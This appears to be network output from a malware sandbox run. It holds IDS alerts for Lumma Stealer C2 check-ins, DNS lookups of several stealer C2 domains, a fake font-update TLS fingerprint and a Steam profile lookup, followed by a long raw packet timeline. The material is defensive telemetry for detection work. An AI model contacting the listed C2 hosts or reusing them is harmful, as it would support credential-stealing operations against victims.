2024-12-17T09:42:52.466380+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49736 | 45.77.249.79 | 443 | TCP
2024-12-17T09:42:52.600050+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.10 | 60706 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:53.587292+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.10 | 60706 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:55.294008+0100 | 2058215 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) | 1 | 192.168.2.10 | 49748 | 104.131.68.180 | 443 | TCP
2024-12-17T09:42:55.294008+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49748 | 104.131.68.180 | 443 | TCP
2024-12-17T09:42:55.296923+0100 | 2822521 | ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) | 1 | 104.131.68.180 | 443 | 192.168.2.10 | 49748 | TCP
2024-12-17T09:42:55.716435+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.10 | 49748 | 104.131.68.180 | 443 | TCP
2024-12-17T09:42:55.716435+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49748 | 104.131.68.180 | 443 | TCP
2024-12-17T09:42:55.722626+0100 | 2058220 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) | 1 | 192.168.2.10 | 54262 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:55.979277+0100 | 2058218 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) | 1 | 192.168.2.10 | 57774 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:56.205224+0100 | 2058216 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) | 1 | 192.168.2.10 | 56891 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:56.428498+0100 | 2058236 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) | 1 | 192.168.2.10 | 55967 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:56.659991+0100 | 2058210 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) | 1 | 192.168.2.10 | 51525 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:56.983802+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.10 | 50695 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:58.661848+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49756 | 104.121.10.34 | 443 | TCP
2024-12-17T09:42:59.448751+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.10 | 49756 | 104.121.10.34 | 443 | TCP
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.438535929 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.438553095 CET44349709104.21.56.70192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.438563108 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.438607931 CET49709443192.168.2.10104.21.56.70
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.562268972 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.682044983 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.682161093 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.682439089 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:42.802032948 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008409977 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008429050 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008441925 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008449078 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008487940 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008538008 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008570910 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008583069 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008595943 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008608103 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008614063 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008622885 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008635044 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008641958 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.008677006 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.128505945 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.128556967 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.128632069 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.128684998 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.132584095 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.132631063 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.201499939 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.201658010 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.201744080 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.201813936 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.205595016 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.205667019 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.205739975 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.205787897 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.212692022 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.212795019 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.215758085 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.215806961 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.215845108 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.215887070 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.225332022 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.225413084 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.225595951 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.225724936 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.232606888 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.232665062 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.232671976 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.232718945 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.243700981 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.243716002 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.243793011 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.250142097 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.250155926 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.250226974 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.259577036 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.259589911 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.259624958 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.259641886 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.266458988 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.266549110 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.266700029 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.266747952 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.274924994 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.274976969 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.275074959 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.275121927 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.282274008 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.282346964 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.283030987 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.283068895 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.321438074 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.321546078 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.392358065 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.392384052 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.392477036 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.394929886 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.394942999 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.394975901 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.394993067 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.399538994 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.399589062 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.401205063 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.401247025 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.401546001 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.401582956 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.406517982 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.406533003 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.406575918 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.612880945 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.612885952 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.612926006 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.615278006 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.615330935 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.615369081 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.615410089 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.617764950 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.617830992 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.617860079 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.617902994 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.620311022 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.620362043 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.620445013 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.620488882 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.622750044 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.622802973 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.622874022 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.622925997 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.625257969 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.625287056 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.625315905 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.625349045 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.627732992 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.627779007 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.627839088 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.627882957 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.630254030 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.630301952 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.630335093 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.630402088 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.632740974 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.632801056 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.632821083 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.632929087 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.635214090 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.635288954 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.635318041 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.635371923 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.637748957 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.637799025 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.637830019 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.637876034 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.639668941 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.639722109 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.639741898 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.639790058 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.642697096 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.642759085 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.642796993 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.642847061 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.644341946 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.644412041 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.644440889 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.644457102 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.645498037 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.645510912 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.645586967 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.647056103 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.647099018 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.647105932 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.647145033 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.648919106 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.648971081 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.649019003 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.649065018 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.650825977 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.650883913 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.650949001 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.651012897 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.652668953 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.652713060 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.652805090 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.652844906 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.654546976 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.654594898 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.654603958 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.654644966 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.656363010 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.656407118 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.656454086 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.656497955 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.658262968 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.658314943 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.658368111 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.658411980 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.660103083 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.660151005 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.660212040 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.660257101 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.662395954 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.662467003 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.808646917 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.809803963 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.809860945 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.809906006 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.809948921 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.811223030 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.811284065 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.811330080 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.811369896 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.812570095 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.812622070 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.812664032 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.812753916 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.813918114 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.813966990 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.814053059 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.814105034 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.815304041 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.815355062 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.815355062 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.815399885 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.816665888 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.816716909 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.816767931 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.816807985 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.818106890 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.818283081 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.818321943 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.818336964 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821244955 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821301937 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821326971 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821343899 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821368933 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821384907 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821389914 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.821429968 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.822274923 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.822324991 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.822444916 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.822491884 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.823549986 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.823586941 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.823594093 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.823621035 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.824918985 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.824973106 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.825047970 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.825103998 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.826289892 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.826344013 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.826390982 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.826432943 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.827831984 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.827836990 CET8049715176.113.115.19192.168.2.10
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.827912092 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.827912092 CET4971580192.168.2.10176.113.115.19
                                                                                                                                                                                                                                          Dec 17, 2024 09:42:44.829015970 CET8049715176.113.115.19192.168.2.10
